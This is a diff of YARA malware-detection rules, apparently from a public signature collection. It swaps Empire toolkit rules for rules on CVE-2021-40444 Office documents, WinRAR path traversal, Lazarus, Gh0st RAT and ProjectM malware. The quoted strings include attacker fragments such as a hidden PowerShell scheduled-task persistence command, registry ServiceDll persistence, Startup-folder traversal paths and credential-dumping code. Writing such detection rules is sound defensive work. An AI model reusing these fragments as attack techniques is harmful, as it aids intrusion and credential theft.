+		filesize < 500KB and $h1 and all of ( $t_* )
+}
+rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_1 : WINDOWS CVE FILE
+{
+	meta:
+		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
-		date = "2016-11-05"
+		id = "ffcaf270-f574-5692-90e5-6776c34eb71b"
+		date = "2021-09-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L109-L122"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d55674866a1a14d4f4c2b5529e47e005ca4b433383bf112af6da41d7f84afdb7"
-		score = 75
+		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "fc8f0dd02460ab8f8cc6717c66eba51e6ed74881a48e92fd0bf978467dfb40e3"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
+		tags = "WINDOWS, CVE, FILE"
 
 	strings:
-		$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
+		$h1 = "<?xml " ascii wide
+		$xml_e = "Target=\"&#" ascii wide
+		$xml_mode_1 = "TargetMode=\"&#" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+		filesize < 500KB and $h1 and 1 of ( $xml* )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Mimikatz_Gen : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_2 : WINDOWS CVE FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-Mimikatz.ps1"
+		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f771a17-2534-5811-80bd-bc1bab37d97c"
-		date = "2016-11-05"
+		id = "c3c5ec4f-5d2a-523c-bd4b-b75c04bac87d"
+		date = "2021-09-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L124-L138"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L83-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a28297025b9b0178ab437996ffd3e0c28526f1edaf61db659093fe41a356cf40"
-		score = 75
+		logic_hash = "82c70e0f0b72a57302e5853cc53ae18dbb0bc8dabdfd27b473a7664b2fc5e874"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		tags = "WINDOWS, CVE, FILE"
 
 	strings:
-		$s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
-		$s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii
+		$h1 = "<?xml " ascii wide
+		$a1 = "Target" ascii wide
+		$a2 = "TargetMode" ascii wide
+		$xml_e = "&#x0000" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Get_Gpppassword : FILE
+rule SIGNATURE_BASE_EXPL_RAR_Archive_With_Path_Traversal_Aug25 : CVE_2025_8088 CVE_2025_6218 FILE
 {
 	meta:
-		description = "Detects Empire component - file Get-GPPPassword.ps1"
+		description = "Detects RAR archives abused for path traversal like CVE-2025-8088 and CVE-2025-6218"
+		author = "Arnim Rupp (Nextron Systems)"
+		id = "de4a42b6-e050-5b7c-9e42-d9e8e0b7e308"
+		date = "2025-08-11"
+		modified = "2025-08-11"
+		reference = "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/#the-discovery-of-cve-2025-8088"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_rar_archive_with_path_traversal_aug25.yar#L1-L24"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "2a8fafa01f6d3863c87f20905736ebab28d6a5753ab708760c0b6cf3970828c3"
+		hash = "dfab2f25c9d870f30bbc4abb873d155cf4904ece536714fb9cd32b2e0126dfab"
+		hash = "107f3d1fe28b67397d21a6acca5b6b35def1aeb62a67bc10109bd73d567f9806"
+		logic_hash = "eedc5cb144e516a1d50aa8cb2fa386cb44d4c6c2de89267dc1c4d14da972069d"
+		score = 70
+		quality = 85
+		tags = "CVE-2025-8088, CVE-2025-6218, FILE"
+
+	strings:
+		$s1 = "..\\\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu"
+		$s2 = "..//../AppData/Roaming/Microsoft/Windows/Start Menu"
+		$s3 = "/.. /.. /AppData/Roaming/Microsoft/Windows/Start Menu/"
+
+	condition:
+		1 of ( $s* ) and ( uint16( 0 ) == 0x4B50 or int32 ( 0 ) == 0x21726152 )
+}
+rule SIGNATURE_BASE_Lazarus_Dec_17_1 : FILE
+{
+	meta:
+		description = "Detects Lazarus malware from incident in Dec 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
-		date = "2016-11-05"
+		id = "f195ebf0-d7af-58e8-a544-769a0c8b628b"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L140-L155"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c879e50805e8b89fc8f3a7c7da2c8e906c89f210ab74194daca6b0ba2d312ba"
+		logic_hash = "50ff8418cf342147a81ef3a418e5e61d42f0e5764982e43b51d4dd3a983a548e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
+		hash1 = "d5f9a81df5061c69be9c0ed55fba7d796e1a8ebab7c609ae437c574bd7b30b48"
 
 	strings:
-		$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
-		$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
-		$s3 = "function Get-DecryptedCpassword {" fullword ascii
+		$s1 = "::DataSpace/Storage/MSCompressed/Transform/" ascii
+		$s2 = "HHA Version 4." ascii
+		$s3 = { 74 45 58 74 53 6F 66 74 77 61 72 65 00 41 64 6F
+              62 65 20 49 6D 61 67 65 52 65 61 64 79 71 }
+		$s4 = "bUEeYE" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5449 and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Smbscanner : FILE
+rule SIGNATURE_BASE_Lazarus_Dec_17_2 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SmbScanner.ps1"
+		description = "Detects Lazarus malware from incident in Dec 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
-		date = "2016-11-05"
+		id = "45127fb5-0f70-5140-acd9-46147d365dfe"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L157-L171"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5feb32dd0fc5271256dc4a088b9b02b591dbe584759db7ee4f5a6c99f42c3c0c"
+		logic_hash = "273cd54a0c3ecf53893de0ef9c41d784725eea6cc843e04df01cd8f29d61a797"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
+		hash1 = "cbebafb2f4d77967ffb1a74aac09633b5af616046f31dddf899019ba78a55411"
+		hash2 = "9ca3e56dcb2d1b92e88a0d09d8cab2207ee6d1f55bada744ef81e8b8cf155453"
 
 	strings:
-		$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
-		$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
+		$s1 = "SkypeSetup.exe" fullword wide
+		$s2 = "%s\\SkypeSetup.exe" fullword ascii
+		$s3 = "Skype Technologies S.A." fullword wide
+		$a1 = "Microsoft Code Signing PCA" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( all of ( $s* ) and not $a1 )
 }
-rule SIGNATURE_BASE_Empire_Exploit_Jboss : FILE
+rule SIGNATURE_BASE_Lazarus_Dec_17_4 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Exploit-JBoss.ps1"
+		description = "Detects Lazarus malware from incident in Dec 2017ithumb.js"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
-		date = "2016-11-05"
+		id = "fbdc6287-c177-53b5-83dd-979936f65192"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L173-L190"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0eef14c3966745a0f2b7eb404eed122a11eea2fb82884ebd2087b3ab90bff93"
+		logic_hash = "70801347699d339cb47cad03ec3f694b09a976e32b70052a97fade09fcac679d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
+		hash1 = "8ff100ca86cb62117f1290e71d5f9c0519661d6c955d9fcfb71f0bbdf75b51b3"
+		hash2 = "7975c09dd436fededd38acee9769ad367bfe07c769770bd152f33a10ed36529e"
 
 	strings:
-		$s1 = "Exploit-JBoss" fullword ascii
-		$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
-		$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
-		$s4 = "http://blog.rvrsh3ll.net" fullword ascii
-		$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
+		$s1 = "var _0xf5ed=[\"\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2E\\x53\\x68\\x65\\x6C\\x6C\"," ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		filesize < 9KB and 1 of them
 }
-rule SIGNATURE_BASE_Empire_Dumpcredstore : FILE
+rule SIGNATURE_BASE_Lazarus_Dec_17_5 : FILE
 {
 	meta:
-		description = "Detects Empire component - file dumpCredStore.ps1"
+		description = "Detects Lazarus malware from incident in Dec 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
-		date = "2016-11-05"
+		id = "33bd8c08-123e-5a8e-b5dc-02af7291addc"
+		date = "2017-12-20"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L192-L207"
+		reference = "https://goo.gl/8U6fY2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L69-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7136920e531d7ab621e743c5c89c0d817fe453108878e3c808814ca48ad57fb3"
+		logic_hash = "480ec19f7050d34713ed621ae9ec5d5463b1cc4710b473465cc78e533796d2e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
+		hash1 = "db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471"
 
 	strings:
-		$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
-		$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
-		$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
+		$x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii
+		$x2 = "$respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;" fullword ascii
+		$x3 = "[String]$PS_PATH = \"C:\\\\Users\\\\Public\\\\Documents\\\\ProxyAutoUpdate.ps1\";" fullword ascii
+		$x4 = "$cmdSchedule = 'schtasks /create /tn \"ProxyServerUpdater\"" ascii
+		$x5 = "/tr \"powershell.exe -ep bypass -windowstyle hidden -file " ascii
+		$x6 = "C:\\\\Users\\\\Public\\\\Documents\\\\tmp' + -join " ascii
+		$x7 = "$cmdResult = cmd.exe /c $cmdInst | Out-String;" fullword ascii
+		$x8 = "whoami /groups | findstr /c:\"S-1-5-32-544\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 40KB and 1 of them ) or all of them
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Egresscheck : FILE
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-EgressCheck.ps1"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21e09250-6853-5743-a6ef-aa6be8091d33"
-		date = "2016-11-05"
+		id = "a74330ab-5249-5125-8f48-27aec7c6eeb4"
+		date = "2016-04-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L209-L222"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L8-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "693564e0bd98ebd03cd433d8ba1003051a5cf6b1f0c05d3c5a4682e6d667327e"
+		logic_hash = "b67c7ff76c14e771c4e952a408c2c006c9ae88fda97b775747a95322aff355e7"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
+		hash1 = "f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197"
+		hash2 = "99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2"
+		hash3 = "6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df"
+		hash4 = "b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5"
 
 	strings:
-		$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
+		$x1 = "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"" fullword ascii
+		$x2 = "Global\\REALCHEL_GLOBAL_SUBMIT_20031020_" ascii
+		$x3 = "\\xclolg2.tmp" ascii
+		$x4 = "Http/1.1 403 Forbidden" fullword ascii
+		$x5 = "%sxsd%d.pif" fullword ascii
+		$x6 = "%s\\%s32.dl_" ascii
+		$x7 = "%-23s %-16s  0x%x(%02d)" fullword ascii
+		$x8 = "RegSetValueEx(start)" fullword ascii
+		$x9 = "%s\\%s64.dl_" ascii
+		$s1 = "viewsc.dll" fullword ascii
+		$s2 = "Proxy-Connection:   Keep-Alive" fullword ascii
+		$s3 = "\\sfc_os.dll" ascii
+		$s4 = "Mozilla/4.0 (compatible)" fullword ascii
+		$s5 = "Http/1.1 403 Forbidden" fullword ascii
+		$s6 = "CONNECT   %s:%d   HTTP/1.1" fullword ascii
+		$s7 = "WindowsUpperVersion" fullword ascii
+		$s8 = "[%d-%d-%d %d:%d:%d] (%s)" fullword ascii
+		$s9 = "SOFTWARE\\Microsoft\\DataAccess\\%s" fullword ascii
+		$s10 = "%s sp%d(%d)" fullword ascii
+		$s11 = "OpenSC ERROR " fullword ascii
+		$s12 = "get rgspath error " fullword ascii
+		$s13 = "Global\\GLOBAL_SUBMIT_0234_" ascii
+		$s14 = "Global\\_vc_ck_ %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 10KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Empire_Reflectivepick_X64_Orig : FILE
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample2 : FILE
 {
 	meta:
-		description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd69a149-d881-5f93-9647-84241bd96ba5"
-		date = "2016-11-05"
-		modified = "2022-12-21"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L224-L240"
+		id = "424cb978-c4d1-5847-8852-e25ec2a02139"
+		date = "2016-04-23"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L54-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a87c5f1da9c490887cba5e9837ca40ac92b63d8c36b682f4be770ac061b5acdf"
+		logic_hash = "f41776a033be766844c9867902d2ef9b79bf59bdf212f0158eccf79db0810460"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "71a52058f6b5cef66302c19169f67cf304507b4454cca83e2c36151da8da1d97"
 
 	strings:
-		$a1 = "\\PowerShellRunner.pdb" ascii
-		$a2 = "PowerShellRunner.dll" fullword wide
-		$s1 = "ReflectivePick" fullword ascii
+		$x1 = "AdobeWpk" fullword ascii
+		$x2 = "seekin.dll" fullword ascii
+		$c1 = "Windows NT 6.1; Trident/6.0)" fullword ascii
+		$c2 = "Mozilla/5.0 (compatible; MSIE 10.0; " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $a* ) and $s1
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( all of ( $x* ) or all of ( $c* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Empire_Out_Minidump : FILE
+rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample3
 {
 	meta:
-		description = "Detects Empire component - file Out-Minidump.ps1"
+		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
-		date = "2016-11-05"
+		id = "6d4bb99d-28de-59c2-b6f0-6da3cac4ed73"
+		date = "2016-04-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L242-L256"
+		reference = "https://blog.cylance.com/the-ghost-dragon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ghostdragon_gh0st_rat.yar#L77-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ce4ac95ac942a2ad758b1d9034e6ec50d25d195ba1c2ae95a90a7490708e485"
+		logic_hash = "39ddb94ac14032f88e54e413ed650277e95f6dcf66219fcf43a01aff1f10a058"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
+		hash1 = "1be9c68b31247357328596a388010c9cfffadcb6e9841fb22de8b0dc2d161c42"
 
 	strings:
-		$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
-		$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
+		$op1 = { 44 24 15 65 88 54 24 16 c6 44 24 }
+		$op2 = { 44 24 1b 43 c6 44 24 1c 75 88 54 24 1e }
+		$op3 = { 1e 79 c6 44 24 1f 43 c6 44 24 20 75 88 54 24 22 }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Psexec : FILE
+rule SIGNATURE_BASE_Projectm_Darkcomet_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PsExec.ps1"
+		description = "Detects ProjectM Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "19aaec3e-3e8f-5d7d-9c70-a212756c0300"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L258-L273"
+		id = "6de74d73-f9b2-5e7f-b15e-f850425d849c"
+		date = "2016-03-26"
+		modified = "2023-01-27"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_m.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "86af63a3be5b4940966932b129edbe4cca5ac1a31d120ba44fdca739e9c97ad4"
+		hash = "cc488690ce442e9f98bac651218f4075ca36c355d8cd83f7a9f5230970d24157"
+		logic_hash = "81ffaa382bb6f817fe2917a096a3eee49d2e8c281271da551ccd65679692712f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
 
 	strings:
-		$s1 = "Invoke-PsExecCmd" fullword ascii
-		$s2 = "\"[*] Executing service .EXE" fullword ascii
-		$s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
+		$x1 = "DarkO\\_2" fullword ascii
+		$a1 = "AVICAP32.DLL" fullword ascii
+		$a2 = "IDispatch4" fullword ascii
+		$a3 = "FLOOD/" fullword ascii
+		$a4 = "T<-/HTTP://" ascii
+		$a5 = "infoes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Postexfil : FILE
+rule SIGNATURE_BASE_Projectm_Crimsondownloader : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PostExfil.ps1"
+		description = "Detects ProjectM Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58d9e057-efde-56ab-9b7e-982342a910e2"
-		date = "2016-11-05"
+		id = "2e0658c9-a93d-5eef-93a2-eb1ab29acaee"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L275-L289"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_m.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74602d1c4986e6392df8845e0ed713499aa3b93c64e9d68e95f9dbaf60fe4299"
+		hash = "dc8bd60695070152c94cbeb5f61eca6e4309b8966f1aa9fdc2dd0ab754ad3e4c"
+		logic_hash = "3c9a4f5aca4c9fc26d371027a32e349a456ef25d6b403a66b9afb1ee19dd4d00"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
 
 	strings:
-		$s1 = "# upload to a specified exfil URI" fullword ascii
-		$s2 = "Server path to exfil to." fullword ascii
+		$x1 = "E:\\Projects\\m_project\\main\\mj shoaib"
+		$s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii
+		$s2 = "secure_scan.exe" fullword wide
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|mswall" fullword wide
+		$s4 = "secure_scan|mswall" fullword wide
+		$s5 = "[Microsoft-Security-Essentials]" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x490a and filesize < 2KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Smbautobrute : FILE
+rule SIGNATURE_BASE_HKTL_Keyword_Injectdll : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
+		description = "Detects suspicious InjectDLL keyword found in hacktools or possibly unwanted applications"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
-		date = "2016-11-05"
+		id = "422eed76-7dfa-5490-a866-d337434eaddc"
+		date = "2019-04-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L291-L305"
+		reference = "https://github.com/zerosum0x0/koadic"
